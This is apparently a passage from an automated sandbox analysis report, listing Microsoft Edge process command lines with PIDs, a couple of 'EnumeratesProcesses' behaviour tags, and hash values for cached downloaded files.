C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:85⤵PID:4524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:4340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:15⤵PID:396
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:15⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:15⤵PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:15⤵PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:15⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:15⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:15⤵PID:4412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3936 /prefetch:15⤵PID:4436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15427752310425884823,16476679631763234689,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:3916
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4172
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3892
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize471B
MD5febff5e5b64433316ee5f116c5c14309
SHA155a533777edeed0d18304f073d59d5ca1e5c7737
SHA256888dd735b3cf97e714243c7ecf44064128c4a97452b90ebbc66e317a113ef9a4
SHA512cbadeca5bbd2528b4af7ad6d053483adac27db83bfcd8b75312a5aa4b09302f729b67a04bbb9af840cb3abd78ec668b5a6c8746685ba0f15780b5e0ea3dd88d8
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
Filesize404B
MD5a47b846824deda1284d2012a5b9b15ef
SHA1b0f7dca95aa0af3874fc51f785e03719690fc17d
SHA256efda91b7d4e77d9229d1d8360db0fd8a2d214e33196fab68860116d7df67cc25
SHA5124eaf3484f0cda4fedec8448cae820426eb3743e71a7d53b8aeefa2a7b88b780a9709cd1bab723f3d00511f498a0cbb87bff0570cb3b07fcfcdec8549acab01fb
-
Filesize
152B
MD561cef8e38cd95bf003f5fdd1dc37dae1
SHA111f2f79ecb349344c143eea9a0fed41891a3467f
SHA256ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e
SHA5126fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d
-
Filesize
152B
MD50a9dc42e4013fc47438e96d24beb8eff
SHA1806ab26d7eae031a58484188a7eb1adab06457fc
SHA25658d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151
SHA512868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f
-
Filesize
5KB
MD582348c79f4b40041a961697cdfb7fde9
SHA1cb67d7da8f4f0052040660dcf81968ec633020d7
SHA256c1b0e2c19b8becfb3c0177a03ed7579d5ad4d42fc28dd23c5ce02d56c6a21fb2
SHA512952165f79487c912207ed0dcc9f9881b20b360a1b9d1ef0cfae739a3a7e445ca782c6e9eafd2a44335bee2487feb4c67d5700755bba884bd66b5bd78eba3e7d3
-
Filesize
6KB
MD58255c67e27b45b7dc5a8fc2cfb50b0ef
SHA1dc55821e9680a143e47b1a23d34b0b72c3faccc3
SHA25660009e890cc65443f4a0687147554f8e9624f7c6885b72ae5460358fb135b9d9
SHA5122e50d0208624e14706b69b7daf53dd47ee5210f4e51158991a732316596edc8824cd9e08ea59787a8a9e1a079127b61f1fc121ec6d9cb539b92fff34a03b561d
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD531b426ad70ab378c9ff627ec972d6612
SHA12c7d04f25c50918cfd11ddce7e8b55a698d6c1d3
SHA2569539462acaeb11cfb7d21f373281e64b075406f2258283b5dc347d2d90180106
SHA512b1a7778b4d0909dee60e8dac7586adfb6f7fdfd080913dc4ed5b5b2dfe85d7a115c6de796f32e69c6d610920bb3caf7325bf5c1f6b70f05485b95a4fd2081d24
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
660KB
MD5cca0fdd8223d36cbe19734d0c66da319
SHA12aa22592eb359f06b6c736afcb7f618ed39b7d5b
SHA2565e7cd1d575632ac26a80091f6355e890732c276a138fe5092a52083d2b3b6d4c
SHA512af42e11c12ac0c12d96078ffbba9055b15b042e201feac7b617b1b310f44c56b0ff6699db4a2fdbb04f384c6f19fdc184692f973a06fbc5a3f72086a4d522657
-
Filesize
55KB
MD5ff5e1f27193ce51eec318714ef038bef
SHA1b4fa74a6f4dab3a7ba702b6c8c129f889db32ca6
SHA256fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320
SHA512c9d654ead35f40eea484a3dc5b5d0a44294b9e7b41a9bacdafdd463d3de9daa2a43237a5f113f6a9c8ea5e1366823fd3d83da18cd8197aa69a55e9f345512a7a
-
Filesize
213KB
MD522ec9bd8587c55918707d4af545317e1
SHA1970c756dd66ea3454718b685dd90afd6f9c06993
SHA256d58c372a42e3ae1e343ad2ed6d3b4c1d510c1d41d909848363b64ebfe3934dbc
SHA512057795bbe5ef4c5fc6e1b814096b807049eac67f84db98725676d348e284d7efd6d39b923a5db8f2b24314ae964776cade48d4983e78272923e205f6e3b59b3c